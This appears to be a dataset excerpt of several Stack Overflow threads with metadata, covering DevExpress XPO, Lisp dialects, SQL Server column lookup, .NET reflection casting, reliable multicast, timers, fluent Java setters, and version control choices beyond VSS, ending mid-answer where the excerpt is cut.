text
stringlengths
8
267k
meta
dict
Q: Any thoughts on DevExpress XPO ORM Package? XPO is the object relational mapper of choice at my company. Any thoughts on the pros and cons? I was just looking for general feeling and anecdotes about the product. We are not switching to XPO. We are just getting rid of hard coded sql strings living in the app and moving completely to ORM for all data access. A: I've been working with it for 6-7 months now and the seller for me was the fact that all of their UI components work relatively seamlessly with XPO - and their UI components are top notch. Some might note that their forums are poorly monitored and have little useful traffic - this is true. The secret is to fill out tickets though. They respond quickly, and accurately to all of their support tickets. A: XPO in overall is easy to work with. However, it can be a little pain when you plan to work with legacy database or try to introduce it into a brownfield app. Most painful obstacles I hit were: * *all objects need to inherit from XPO related classes and/or use XPO related attributes. So, no POCO objects *no support for readonly persistent fields OOTB. It's possible, but you need to do a little hacking to stop XPO from updating field in DB *no support for pre filtering associations, which can cause excessive network load *Poor support for foreign composite keys. To be fair, no ORM handles composite keys nicely. They are considered to be "anti-ORM" pattern. *few small annoyances As Dennis pointed out in comments, XPO was greatly improved since I wrote this answer originally. In particular, below things are no longer an issue: * *no serialization, so XPO objects are hard to use in disconected win forms scenario, with data coming through web services. - XPO supports now various serialization scenarios and can be easily used with WCF. *you cannot do many-to-many relation mapping with your own interim table. Xpo wants specific name for such interim tables. - This is no longer a case *no support for enums in postgreSql provider - You just need to write really simple value converter and you are good. Also, below issues will no longer be problem with next XPO release, coming later this year: * *no support for keys of type long *no support for db schema in postrgeSql provider All in all, XPO was greatly improved. Most painfull obstacles were removed. You can still hit problems while working with legacy DB. But in general XPO became quite convenient to use. A: XPO ver 10.2 now supports for both StoredProcedures and SqlQueries. See infomation here... A: Others will probably pitch in with technical answers (e.g. the query syntax, use of caching, ease or otherwise of mapping to an existing database structure) -- but if you have an established ORM layer the answer is probably "Why change"? I've used XPO successfully for years in an established commercial product with several hundred users. I find that it's fast, flexible and does the job. I don't see any need to change at the moment, as our data volumes aren't particularly large and the foibles (caching, mostly) are things we can work around. If I were starting afresh I'd definitely look at both NHibernate and the ADO.NET Entity Framework. In practice, though, all are good; I'd most likely look at the commercial situation for the project ahead of the technical questions. For instance, NHibernate is open-source -- is there a viable community there to support the tool and to provide (if necessary) commercial support? XPO comes from a tools vendor, are they likely to remain in business for the lifetime of the product? ADO.NET Entity Framework comes from Microsoft, who are notorious for changing database technologies more often then Larry fills his fighter with jet fuel -- will this, too, fade away? A: I have found XPO very frustrating to work with. The main idea of an ORM is to abstract away the underlying data structure. But very quickly you'll notice that they have the default string length hardcoded to 60 chars, so you end up adding these ugly string.unlimited things around every string. So much for abstraction... When modelling more complex object you have to use a lot of syntax that really has no place in your object model, like XPCollection. I wanted to store a class which had a dictionary of strings on the class, but sadly XPO was not able to automatically store this into the database. So while it works ok for simple types, it very quickly breaks down when you want to store more complex things. That combined with their mediocre support really leaves a LOT to be desired. A: The pros and cons compared to what? There are a lot of alternatives out there, the most popular being nHibernate, with the new kid 'ADO.NET Entity Framework' on the block. Anyways, there are hundreds of answers depending on your situation and requirements. A: I like the fact that you can just create classes, and xpo creates the tables and relationships for you - so you can start from a blank database. One issue I don't like is when I want to delete a whole bunch of stuff, it will go through my collection and do a delete on each one. This takes ages, so for this kind of instance, I've had to write some custom sql (delete from table where blah). I'm no expert on XPO, but that's what I found. A: I second the fact the deleting complex objects with some collections take really, really long. So far the documentation or the forums were not able to help me with this. Apart from that it is really simple to use and gets you going quickly. It is also quite hard to figure out your memory usage, I had complex big objects in my design and working with them was a memory hog bigger than I had assumed. A: This is all you need to do to start writing your domain objects (try do the same in other systems): using System; using DevExpress.Xpo; using DevExpress.Data.Filtering; using NUnit.Framework; namespace XpoTdd { public class Person:XPObject { public Person(Session session) : base(session) { } public string FirstName { get; set; } public string LastName { get; set; } [Persistent] public string FullName { get { return FirstName + " " + LastName; } } } [TestFixture] public class PersonTests { [Test] public void TestPersistence() { const string connStr = "Integrated Security=SSPI;Pooling=false;Data Source=(local);Initial Catalog=XpoTddTest"; UnitOfWork session1 = new UnitOfWork(); session1.ConnectionString = connStr; Person me = new Person(session1); me.FirstName = "Roman"; me.LastName = "Eremin"; session1.CommitChanges(); UnitOfWork session2 = new UnitOfWork(); session2.ConnectionString = connStr; me = session2.FindObject<Person>(CriteriaOperator.Parse("FullName = 'Roman Eremin'")); Assert.AreEqual("Roman Eremin", me.FullName); } } }
{ "language": "en", "url": "https://stackoverflow.com/questions/31559", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "22" }
Q: Keeping CL and Scheme straight in your head Depending on my mood I seem to waffle back and forth between wanting a Lisp-1 and a Lisp-2. Unfortunately beyond the obvious name space differences, this leaves all kinds of amusing function name/etc problems you run into. Case in point, trying to write some code tonight I tried to do (map #'function listvar) which, of course, doesn't work in CL, at all. Took me a bit to remember I wanted mapcar, not map. Of course it doesn't help when slime/emacs shows map IS defined as something, though obviously not the same function at all. So, pointers on how to minimize this short of picking one or the other and sticking with it? A: Map is more general than mapcar, for example you could do the following rather than using mapcar: (map 'list #'function listvar) How do I keep scheme and CL separate in my head? I guess when you know both languages well enough you just know what works in one and not the other. Despite the syntactic similarities they are quite different languages in terms of style. A: Well, I think that as soon you get enough experience in both languages this becomes a non-issue (just with similar natural languages, like Italian and Spanish). If you usually program in one language and switch to the other only occasionally, then unfortunately you are doomed to write Common Lisp in Scheme or vice versa ;) One thing that helps is to have a distinct visual environment for both languages, using syntax highlighting in some other colors etc. Then at least you will always know whether you are in Common Lisp or Scheme mode. A: I'm definitely aware that there are syntactic differences, though I'm certainly not fluent enough yet to automatically use them, making the code look much more similar currently ;-). And I had a feeling your answer would be the case, but can always hope for a shortcut <_<. A: The easiest way to keep both languages straight is to do your thinking and code writing in Common Lisp. Common Lisp code can be converted into Scheme code with relative ease; however, going from Scheme to Common Lisp can cause a few headaches. I remember once where I was using a letrec in Scheme to store both variables and functions and had to split it up into the separate CL functions for the variable and function namespaces respectively. In all practicality though I don't make a habit of writing CL code, which makes the times that I do have to all the more painful.
{ "language": "en", "url": "https://stackoverflow.com/questions/31561", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Query to list all tables that contain a specific column with SQL Server 2005 Question as stated in the title. A: http://blog.sqlauthority.com/2008/08/06/sql-server-query-to-find-column-from-all-tables-of-database/ USE AdventureWorks GO SELECT t.name AS table_name ,SCHEMA_NAME(schema_id) AS schema_name ,c.name AS column_name FROM sys.tables AS t INNER JOIN sys.columns c ON t.OBJECT_ID = c.OBJECT_ID WHERE c.name LIKE '%EmployeeID%' ORDER BY schema_name ,table_name;
{ "language": "en", "url": "https://stackoverflow.com/questions/31566", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
Q: How to properly cast objects created through reflection I'm trying to wrap my head around reflection, so I decided to add plugin capability to a program that I'm writing. The only way to understand a concept is to get your fingers dirty and write the code, so I went the route of creating a simple interface library consisting of the IPlugin and IHost interfaces, a plugin implementation library of classes that implement IPlugin, and a simple console project that instantiates the IHost implementation class that does simple work with the plugin objects. Using reflection, I wanted to iterate through the types contained inside my plugin implementation dll and create instances of types. I was able to sucessfully instantiate classes with this code, but I could not cast the created object to the interface. I tried this code but I couldn't cast object o as I expected. I stepped through the process with the debugger and the proper constructor was called. Quickwatching object o showed me that it had the fields and properties that I expected to see in the implementation class. loop through assemblies loop through types in assembly // Filter out unwanted types if (!type.IsClass || type.IsNotPublic || type.IsAbstract ) continue; // This successfully created the right object object o = Activator.CreateInstance(type); // This threw an Invalid Cast Exception or returned null for an "as" cast // even though the object implemented IPlugin IPlugin i = (IPlugin) o; I made the code work with this. using System.Runtime.Remoting; ObjectHandle oh = Activator.CreateInstance(assembly.FullName, type.FullName); // This worked as I intended IPlugin i = (IPlugin) oh.Unwrap(); i.DoStuff(); Here are my questions: * *Activator.CreateInstance(Type t) returns an object, but I couldn't cast the object to an interface that the object implemented. Why? *Should I have been using a different overload of CreateInstance()? *What are the reflection related tips and tricks? *Is there some crucial part of reflection that I'm just not getting? A: I'm just guessing here because from your code it's not obvious where do you have definition of IPlugin interface but if you can't cast in your host application then you are probably having IPlugin interface in your host assembly and then at the same time in your plugin assembly. This won't work. The easiest thing is to make this work is to have IPlugin interface marked as public in your host assembly and then have your Plugin assembly reference host application assembly, so both assemblies have access to the very same interface. A: hmmm... If you are using Assembly.LoadFrom to load your assembly try changing it Assembly.LoadFile instead. Worked for me From here: http://www.eggheadcafe.com/community/aspnet/2/10036776/solution-found.aspx A: @lubos hasko You nailed it on the nose. My original design did have three different assemblies with both the host and plugin implementation referencing the plugin interface assembly. I tried a separate solution with a host implementation and interface assembly and a plugin implementation assembly. Within that solution, the code in the first block worked as expected. You've given me a bit more to think about, because I'm not quite understanding why two assemblies referencing a common assembly don't get the same type out of the common assembly. A: I was just trying to work this out myself and managed to stumble on the answer! I had 3 different C# projects * *A - Plugin Interface project *B - Host exe project -> references A *C - Plugin Implementation project -> references A I was getting the casting error as well until I changed the assembly name for my Plugin Interface proj to match the namespace of what I was trying to cast to. E.g. IPluginModule pluginModule = (IPluginModule)Activator.CreateInstance(curType); was failing because the assembly that the IPluginModule interface was defined in was called 'Common', The -type- I was casting to was 'Blah.Plugins.Common.IPluginModule' however. I changed the Assembly name for the interface proj to be 'Blah.Plugins.Common' meant that the cast then succeeded. Hopefully this explanation helps someone. Back to the code.. A: Is your type not public, if so, call the overload that takes in a boolean: Activator.CreateInstance(type, true); Also, in your first example, see if o is null and if not, print out o.GetType().Name to see what it really is. A: @Haacked I tried to keep the pseudocode simple. foreach's take up a lot of space and braces. I clarified it. o.GetType().FullName returns Plugins.Multiply which is the expected object. Plugins.Multiply implements IPlugin. I stepped through the process in the debugger quite a few times until I gave up for the evening. Couldn't figure out why I couldn't cast it because I watched the constructor fire until I got grumpy about the whole mess. Came back to it this evening and made it work, but I still don't understand why the cast failed in the first code block. The second code block works, but it feels off to me. A: The link to egghead above is the main solution to the problem use Assembly.LoadFile() instead of .LoadFrom()
{ "language": "en", "url": "https://stackoverflow.com/questions/31567", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "10" }
Q: Broadcast like UDP with the reliability of TCP I'm working on a .net solution that is run completely inside a single network. When users make a change to the system, I want to launch an announcement and have everyone else hear it and act accordingly. Is there a way that we can broadcast out messages like this (like UDP will let you do) while keeping guaranteed delivery (like TCP)? This is on a small network (30ish clients), if that would make a difference. A: You could use Spread to do group communication. A: @epatel - I second the SCTP suggestion (I voted up, but can't comment yet so additional stuff here). SCTP has many great features and flexibility. You can sub-divide your connection into multiple streams, and choose the reliablity of each and whether it is ordered or not. Alternatively, with the Partially Reliability extension, you can control reliability on a per message basis. A: Broadcast is not what you want. Since there could and probably will be devices attached to this network which don't care about your message, you should use Multicast. Unlike broadcast messages, which must be sent to and processed by every client on the network, Multicast messages are delivered only to interested clients (ie those which have some intention to receive this particular type of message and act on it). If you later scale this system up so that it needs to be routed over a large network, multicast can scale to that, whereas broadcast won't, so you gain a scalability benefit which you might appreciate later. Meanwhile you eliminate unnecessary overhead in switches and other devices that don't need to see these "something changed" messages. A: You might want to look into RFC 3208 "PGM Reliable Transport Protocol Specification". Here is the abstract: Pragmatic General Multicast (PGM) is a reliable multicast transport protocol for applications that require ordered or unordered, duplicate-free, multicast data delivery from multiple sources to multiple receivers. PGM guarantees that a receiver in the group either receives all data packets from transmissions and repairs, or is able to detect unrecoverable data packet loss. PGM is specifically intended as a workable solution for multicast applications with basic reliability requirements. Its central design goal is simplicity of operation with due regard for scalability and network efficiency. A: You could use a Message Broker, such as ActiveMQ. Publish your messages to a topic and have the clients register durable subscriptions to the topic, so that they won't miss any messages even if they are not online. Apache ActiveMQ is a message broker written in Java together with a full JMS client. However Apache ActiveMQ is designed to communicate over a number of protocols such as Stomp and OpenWire together with supporting a number of different language specific clients. Client platform support includes c# and .net A: Almost all games have a need for the fast-reacting properties (and to a lesser extent, the connectionless properties) of UDP and the reliability of TCP. What they do is they build their own reliable protocol on top of UDP. This gives them the ability to just burst packets to whereever and optionally make them reliable, as well. The reliable packet system is usually a simple retry-until-acknowledged system simpler than TCP but there are protocols which go way beyond what TCP can offer. Your situation sounds very simple. You'll probably be able to make the cleanest solution yourself - just make every client send back an "I heard you" response and have the server keep trying until it gets it (or gives up). If you want something more, most custom protocol libraries are in C++, so I am not sure how much use they'll be to you. However, my knowledge here is a few years old - perhaps some protocols have been ported over by now. Hmm... RakNet and enet are two C/C++ libraries that come to mind. A: Take a look at sctp which has a combination of tcp and udp features. There is a windows implementation available. A: You could implement your own TCP-like behaviour at the application layer. So for instance, you'd send out the UDP broadcast, but then expect a reply response from each host. If you didn't get a response within X seconds, then send another and so on until reaching some sort of threshold. If the threshold is reached (i.e. the host didn't respond at all), then report an error. To do this though, you'd need a pre-defined list of hosts to expect the responses back from. A: Create a TCP server. Have each client connect. In your TCP protocol with the clients, create each packet with a 2-byte prefix of the total size of the following message. Clients then call read(max_size=2) on the socket to determine the size of the next message, and then read(max_size=s) to collect the message. You get reliable, ordered messages, simple. You don't need a messaging framework for this one. A: You'd definitely want to look into Pragmatic General Multicast: While TCP uses ACKs to acknowledge groups of packets sent (something that would be uneconomical over multicast), PGM uses the concept of Negative Acknowledgements (NAKs). For further G-diving, the term you're looking for is reliable multicast. Also take a look at Multipath TCP. A: What you can do is that after the broadcast have the clients initiate the tcp connections. Otherwise you just have to keep a list of all clients and initiate the connections to each client yourself. A: I think there are three options, broadly speaking: * *Instead of broadcasting UDP, you could create an entity (a thread, process, server, service, or whatever the thing is that exists in your solution) that keeps a list of subscribers and sends unicast UDP messages to them. *Use UDP multicast, but you'll have to write some sort of mechanism that would take care of reliable delivery for you (i.e., retries, timeouts, etc). This also means you have to get a reply from your clients. *If you're not afraid of experimental transport protocols, you might look here for suggestions., A: Yoy should take a look at the Norm (NACK-Oriented Reliable Multicast) specification. You can find information about Norm here. The NORM protocol is designed to provide end-to-end reliable transport of bulk data objects or streams over generic IP multicast routing and forwarding services. NORM uses a selective, negative acknowledgement (NACK) mechanism for transport reliability and offers additional protocol mechanisms to conduct reliable multicast sessions with limited "a priori" coordination among senders and receivers It somewhat very well known in the military world. Norm specs. Norm Source A: Why build something from scratch if you can use library? Especially for such small project? Try use Emcaster which itself using reliable multicast messaging - PGM, is written in .NET and with full source. You will get nice pub/sub engine with topic filtering readily available. Or you can learn from code how to do it and base your own extension on it. A: I think the most irritating feature of TCP in these scenarios is the ability/way of sorting incoming packets to their original order - the concept of a stream. You cannot read a byte until the byte before it arrived. If you can live without it, you have your chance to have your protocol, fast and reliable, but not for ordering of packets! It's simply impossible to manage both of them, because you cannot order your bytes until you receive an other copy of a lost packet, that's the main tradeoff. A: do a RDP multicast.
{ "language": "en", "url": "https://stackoverflow.com/questions/31572", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "19" }
Q: How scalable is System.Threading.Timer? I'm writing an app that will need to make use of Timers, but potentially very many of them. How scalable is the System.Threading.Timer class? The documentation merely say it's "lightweight", but doesn't explain further. Do these timers get sucked into a single thread (or very small threadpool) that processes all the callbacks on behalf of a Timer, or does each Timer have its own thread? I guess another way to rephrase the question is: How is System.Threading.Timer implemented? A: I think you might want to rethink your design (that is, if you have control over the design yourself). If you're using so many timers that this is actually a concern for you, there's clearly some potential for consolidation there. Here's a good article from MSDN Magazine from a few years ago that compares the three available timer classes, and gives some insight into their implementations: http://msdn.microsoft.com/en-us/magazine/cc164015.aspx A: Consolidate them. Create a timer service and ask that for the timers. It will only need to keep 1 active timer (for the next due call)... For this to be an improvement over just creating lots of Threading.Timer objects, you have to assume that it isn't exactly what Threading.Timer is already doing internally. I'd be interested to know how you came to that conclusion (I haven't disassembled the native bits of the framework, so you could well be right). A: I say this in response to a lot of questions: Don't forget that the (managed) source code to the framework is available. You can use this tool to get it all: http://www.codeplex.com/NetMassDownloader Unfortunately, in this specific case, a lot of the implementation is in native code, so you don't get to look at it... They definitely use pool threads rather than a thread-per-timer, though. The standard way to implement a big collection of timers (which is how the kernel does it internally, and I would suspect is indirectly how your big collection of Timers ends up) is to maintain the list sorted by time-until-expiry - so the system only ever has to worry about checking the next timer which is going to expire, not the whole list. Roughly, this gives O(log n) for starting a timer and O(1) for processing running timers. Edit: Just been looking in Jeff Richter's book. He says (of Threading.Timer) that it uses a single thread for all Timer objects, this thread knows when the next timer (i.e. as above) is due and calls ThreadPool.QueueUserWorkItem for the callbacks as appropriate. This has the effect that if you don't finish servicing one callback on a timer before the next is due, that your callback will reenter on another pool thread. So in summary I doubt you'll see a big problem with having lots of timers, but you might suffer thread pool exhaustion if large numbers of them are firing at the same timer and/or their callbacks are slow-running. A: ^^ as DannySmurf says : Consolidate them. Create a timer service and ask that for the timers. It will only need to keep 1 active timer (for the next due call) and a history of all the timer requests and recalculate this on AddTimer() / RemoveTimer().
{ "language": "en", "url": "https://stackoverflow.com/questions/31581", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "26" }
Q: Design: Java and returning self-reference in setter methods For classes that have a long list of setters that are used frequently, I found this way very useful (although I have recently read about the Builder pattern in Effective Java that is kinda the same). Basically, all setter methods return the object itself so then you can use code like this: myClass .setInt(1) .setString("test") .setBoolean(true); Setters simply return this in the end: public MyClass setInt(int anInt) { // [snip] return this; } What is your opinion? What are the pros and cons? Does this have any impact on performance? Also referred to as the named parameter idiom in c++. A: I wouldn't do it myself, because to me it muddies what a particular method does, and the method-chaining is of limited use to me over doing it longhand. It isn't going to send me into a quivering ball of rage and psychosis, though, which is always a good thing. :') I wouldn't be concerned about performance; just ask Knuth. A: @pek Chained invocation is one of proposals for Java 7. It says that if a method return type is void, it should implicitly return this. If you're interested in this topic, there is a bunch of links and a simple example on Alex Miller's Java 7 page. A: This is called a Fluent Interface, for reference. Personally, I think it's a pretty neat idea, but a matter of taste really. I think jQuery works this way. A: I find this to be in poor style when used in setters. Immutable classes are usually a better fit for chaining, such as: aWithB = myObject.withA(someA).withB(someB); where myObject is of this class: class MyClass { withA(TypeA a) { this.a.equals(a) ? this : new MyClass(this, a); } private MyClass(MyClass copy, TypeA a) { this(copy); this.a = a; } } The builder pattern is also useful, since it allows the final object to be immutable while preventing the intermediate instances you would normally have to create when using this technique. A: It makes sense for builders, where all you are going to do is set a load of stuff, create the real object and throw the builder away. For builders, you might as well get rid of the "set" part of the method name. Similarly, immutable types don't really need the "get". Something thing = new SomethingBuilder() .aProperty(wotsit) .anotherProperty(somethingElse) .create(); A useful trick (if you don't mind a ~2K runtime overhead per class) is to use the double brace idiom: JFrame frame = new JFrame("My frame") {{ setDefaultCloseOperation(DISPOSE_ON_CLOSE); setLocation(frameTopLeft); add(createContents()); pack(); setVisible(true); }}; A: This idea is seen a lot in c++, it allows operations to be cascaded... for example std::cout << "this" << "is" << "cascading" is where the stream method << returns an instance of itself (*this). see this: http://www.java2s.com/Tutorial/Cpp/0180__Class/Cascadingmemberfunctioncallswiththethispointer.htm A: I use to be a fan of the Java (and worse C#) practice of making getters and setters (get set properties) throughout an object. This use to be what I considered object oriented, but really this leads us just to exposing the guts and implementation of the object and not really taking advantage of encapsulation. There are times you can't get away from this (OR/M comes to mind), but in general the object should be set up and then perform its function. My dream objects tend to have one or two constructors, and maybe a half dozen functions that do work. The reason for this is that once I started developing API's there is a real need to keep things simple. You really only want to add as much complexity as is required to get the job done, and getters and setters, while simple in themselves, add complexity in heaps when added in mass. What happens when I load setters i na different order? Anythign different? Are you sure? A: @Dan again, for more complex situations (immutability comes in mind) the Builder Pattern is a great solution. Also, I agree with you mostly in getters. I believe what you are saying is to mostly follow the "Tell don't ask" paradigm and I greatly agree. But that is oriented mostly at getters. Lastly, all of the above are for classes that have a great deal of attributes. I don't see a reason for any if you only have less than, say, 7. A: I ended up doing this a lot when working with the Apache POI excel library; I ended up writing helper methods that chained so I could apply formatting, data types, internal cell data, formulas, and cell positioning. For stuff with lots of little tiny flyweight elements that need to have finicky little tweaks applied it works pretty well. A: How To Use /** * * @author sanjay */ public class NewClass { private int left ; private int top; public void set(int x,int y) { left=x; top=y; } public NewClass UP(int x) { top+=x; return this; } public NewClass DOWN(int x) { top-=x; return this; } public NewClass RIGHT(int x) { left+=x; return this; } public NewClass LEFT(int x) { left-=x; return this; } public void Display() { System.out.println("TOP:"+top); System.out.println("\nLEFT\n:"+left); } } public static void main(String[] args) { // TODO code application logic here NewClass test = new NewClass(); test.set(0,0); test.Display(); test.UP(20).UP(45).DOWN(12).RIGHT(32).LEFT(20); test.Display(); A: I agree with @Bernard that method chaining like this muddles the purpose of the setters. Instead I would suggest that if you are always creating chains of setters like this that you create a custom Constructor for your class so instead of MyClass .setInt(1) .setString("test") .setBoolean(true) ; You do new MyClass(1,"test",true); This makes it more readable and you can use this to make your class immutable if you chose to.
{ "language": "en", "url": "https://stackoverflow.com/questions/31584", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "22" }
Q: How to get the libraries you need into the bin folder when using IoC/DI I'm using Castle Windsor to do some dependency injection, specifically I've abstracted the DAL layer to interfaces that are now being loaded by DI. Once the project is developed & deployed all the .bin files will be in the same location, but for while I'm developing in Visual Studio, the only ways I can see of getting the dependency injected project's .bin file into the startup project's bin folder is to either have a post-build event that copies it in, or to put in a manual reference to the DAL project to pull the file in. I'm not totally thrilled with either solution, so I was wondering if there was a 'standard' way of solving this problem? A: Could you set the build output path of the concrete DAL project to be the bin folder of the dependent project? A: Mike: Didn't think of that, that could work, have to remember to turn off copy-local for any libraries / projects that are common between them
{ "language": "en", "url": "https://stackoverflow.com/questions/31592", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "1" }
Q: Testing a client-server application I am coding a client-server application using Eclipse's RCP. We are having trouble testing the interaction between the two sides as they both contain a lot of GUI and provide no command-line or other remote API. Got any ideas? A: I have about 1.5 years worth of experience with the RCP framework, I really liked it. We simply JUnit for testing... It's sort of cliche to say, but if it's not easy to test, maybe the design needs some refactoring? Java and the RCP framework provide great facilities for keeping GUI code and logic code separate. We used the MVC pattern with the observer, observable constructs that are available in Java... If you don't know about observer / observable construct that are in Java, I would HIGHLY recommend you take a look at this: http://www.javaworld.com/javaworld/jw-10-1996/jw-10-howto.html, you will use it all the time and your apps will be easier to test. A: As a former Test & Commissioning manager, I would strongly argue for a test API. It does not remove the need for User Interface testing, but you will be able to add automated tests and non regression tests. If it's absolutely impossible, I would setup a test proxy, where you will be able to: * *Do nothing (transparent proxy). Your app should behave normally. *Spy / Log data traffic. Add a filter mechanism so you don't grab everything *Block specific messages. Your filter system is very useful here *Corrupt specific messages (this is more difficult) If you need some sort of network testing: * *Limit general throughput (some libraries do this) *Delay messages (same remark) *Change packet order (quite difficult) A: Have you considered using a UI functional testing tool? You could check out HP's QuickTest Professional which covers a wide varieties of UI technologies. A: we are developing one client-server based application using EJB(J2EE) technology, Eclips and MySQL(Database). pl suggest any open source testing tool for functional testing . thanks Hitesh Shah A: Separate your client-server communication into a pure logic module (or package). Test this separately - either have a test server, or use mock objects. Then, have your UI actions invoke the communications layer. Also, have a look at the command design pattern, using it may help you.
{ "language": "en", "url": "https://stackoverflow.com/questions/31598", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "2" }
Q: Alternative to VSS for a one man show (army of one?) I've been programming for 10+ years now for the same employer and only source code control we've ever used is VSS. (Sorry - That's what they had when I started). There's only ever been a few of us; two right now and we usually work alone, so VSS has worked ok for us. So, I have two questions: 1) Should we switch to something else like subversion, git, TFS, etc what exactly and why (please)? 2) Am I beyond all hope and destined to eternal damnation because VSS has corrupted me (as Jeff says) ? Wow - thanks for all the great responses! It sounds like I should clearify a few things. We are a MS shop (Gold parntner) and we mostly do VB, ASP.NET, SQL Server, sharepoint & Biztalk work. I have CS degree so I've done x86 assembly C, C++ on DEC Unix and Slackware Linux in a "time out of mind" ... My concern with VSS is that now I'm working over a VPN a lot more and VSS's performance sux and I'm afraid that our 10+ y/o version 5 VSS database is going to get hoosed... There's the LAN service that's supposed to speed things up, but Ive never used it and I'm not sure it helps with corruption - has anyone used the VSS LAN service? (new with VSS 2005) A: If you're used to the way VSS works, check out (no pun intended) Sourcegear's vault. It's an excellent way to migrate away from VSS as it comes with IDE integration and supports check out / check in, but when you're ready and feel comfortable you can also move to the edit update commit style of programming found in SVN. It's free for single developers, runs on IIS and is built on .net so it should be a fairly familiar stack for you to switch to. A: Whatever you do, don't change for the sake of changing. If it's working for you and you're not having problems with it, I don't see any reason to switch. A: For what it's worth, Perforce is a potential option if you truly stick to 1 or 2 users. Current perforce docs says you have have 2 users and 5 clients without having to start purchasing licenses. You might have reasons to switch to perforce depending on your workflow and if you have need of branching the way perforce does it. Not being overly familar with some the other products mentioned here, I can't tell you how perforce compares in the feature department for things like branching, etc. It is speedy, and it's been rock solid for us (300+ developers on a 10+ year old codebase). We store several T of info and it's been quite responsive. With a small number of users, I doubt that you'd experience many performance troubles assuming you had good hardware for your server. Having used VSS before, I believe that you can get so many benefits out of a better SCM system that switching should be considered regardless of whether you have corruption or not. Branching alone might be worth it for you. A true client/server model, better interfaces (programmatically and command line) are a couple of other things that could really help just improve your workflow and help somewhat with productivity. In summary, my view of Perforce is: * *It's fast and quite reliable *Plenty of cross platform client tools (windows, unix, mac, etc) *it's free for 2 users and 5 clients *Integrates into developer studio (and other tools) *Has a powerful branching system (that might or might not be right for you). *Has several scriptable interfaces (python, perl, ruby, C++) Certainly YMMV -- I only offer this alternative up as something that might be worthwhile looking into. A: I've recently started using Mercurial for some of my work. It's a distributed system like Git but seems easier to use and seems far better supported on Windows, the latter of which was crucial for me. With distributed source code control every user has a complete local copy of the repository. If you're the only person working on a project, as you say you often are, this can simplify things a lot since you just create your own repository and do all your commits etc. locally. If you want to bring on other developers later you can just push the full contents of your repository - current versions and all history - to another system, either on a shared server or directly on to another users' workstation. If you're working only with a local repository remember you'll need a also backup solution as there isn't a copy of all your code on a shared server. I think that Mercurial has lots of other advantages over Subversion, but it does have a big downside which has already been mentioned as a plus point of Subversion: there a lots of third party tools and integrations for Subversion. As Mercurial hasn't been around nearly as ong the choice is much less. On Windows it seems that you either have to use the command line (my choice) or the TortoiseHg Windows Explorer integration. A: VSS is horrible. I may be channelling Spolsky (not sure if he's said this), but using VSS is actually worse than not using source control at all. Despite its name, it isn't safe. It creates the illusion of safety without providing it. Without VSS, you'd probably be making regular backups of your code. With VSS, you'll think, "Mehh, it's already under source control. Why bother backing up?" Great until it corrupts your entire codebase and you lose everything. (This, incidentally, happened at a company I worked at.) Get rid of VSS as soon as you can and switch to a real source control solution. A: Don't worry about VSS corrupting you, worry about VSS corrupting your data. It does not have a good track record in that department. Back up frequently if you do not switch to a different version control system. Backups should be happening daily even with other SCMs, but it's doubly important with VSS. A: I like using Subversion for my personal projects. I could go down the list of features and pretend like it brings a lot to the table that other source control systems don't, but there's tons of good ones out there and the right choices is really a matter of style. If you check in after each small change (i.e. one checkin per function change), then many people can work on the same source file with very low risk of merge conflicts in practically anything but VSS (I haven't used VSS in years but from what I remember only one person at a time can work on a file.) If this isn't ever going to happen to you, I feel like the best course of action is to use what you know. VSS is better than no source control at all, but it feels restrictive to me these days. I don't think you're beyond hope because you're asking if it would be better to switch; you're beyond hope when the answer is obvious and you ignore the evidence. Even if you don't change source control systems, you ought to pick one like SVN or git and spend a few weeks reading about it and making a small project using it; it always helps to sharpen the saw. A: I'd probably go with Subversion, if I were you. I'm a total Git fanatic at this point, but Subversion certainly has some advantages: * *simplicity *abundance of interoperable tools *active and supportive community *portable *Has really nice Windows shell integration *integrates with visual studio (I think - but surely through a third party) Git has many, many other advantages, but the above tend to be the ones people care about when asking general questions like the above. Edit: the company I now work for is using VisualSVN server, which is free. It makes setting up a Subversion repository on a Windows server stupid simple, and on the client we're using TortoiseSVN (for shell integration) and AnkhSVN for Visual Studio support. It's quite good, and should be fairly easy for even VSS users to pick up. Latter-day Edit: So....nearly eight years later, I would never recommend Subversion to anyone for any reason. I don't really recant, per se, because I think my advice was valid at the time. However, in 2016, Subversion retains almost none of the advantages it used to have over Git. The tooling for Git is superior to (and much more diverse) what it once was, and in particular, there's GitHub and other good Git hosting providers (BitBucket, Beanstalk, Visual Studio Online, just off the top of my head). Visual Studio now has Git support out-of-the-box, and it's actually pretty good. There are even PowerShell modules to give a more native Windows experience to denizens of the console. Git is even easier to set up and use than Subversion and doesn't require a server component. Git has become as ubiquitous as any single tool can be, and you really would only be cheating yourself to not use it (unless you just really want to use something not-Git). Don't misunderstand - this isn't me hating on Subversion, but rather me recognizing that it's a tool from another time, rather like a straight razor for shaving. A: I don't agree with the people that say that if you don't have problems you'd better not switch. I think that SCM is some of the disciplines a good developer should know well, and frankly, even if you master VSS you are just experimenting a small fraction of the advantages a good SCM tool and SCM strategy can do for you and for your team. Obviously evaluate and test the alternatives first in a non-production environment. A: At work we use subversion with TortoiseSVN - works very nicely but it is philosophically different to VSS (not really a problem if there's just you but worth being aware of). I really like the fact that the whole repository has a revision number. Given a free choice I'd've probably gone with vault but at the time I had zero budget. I'm looking at things for personal use. There are reasons to use subversion and reasons to use something completely different. The alternatives I'm considering are Vault (as before, free for single use) and Bazaar. GIT I've had to dismiss as I am, unashamedly, a Windows person and right now GIT just isn't. The distributed nature of GIT and the option of private/temporary checkins (assuming I've understood what I've read) is attractive - hence my looking at Bazaar. Update: I did some more digging and playing and I actually went for Mercurial for personal use, integrated install with TortoiseHg makes things very simple and it seems to be well regarded. I'm still trying to work out how to force an automagic mirror of commits to a server and there appear to be some minor limitations to the ignore function but its doing the job nicely so far... Murph A: Looks like SubVersion is the winner here. I'd do yourself a favor and use VisualSVN Server. It's free and will save you a bunch of installation headaches. A: I'd say stick with what works for you. Unless you are having issues with VSS, why switch? Subversion is swell, though a little sticky to begin using it. TFS is far better than 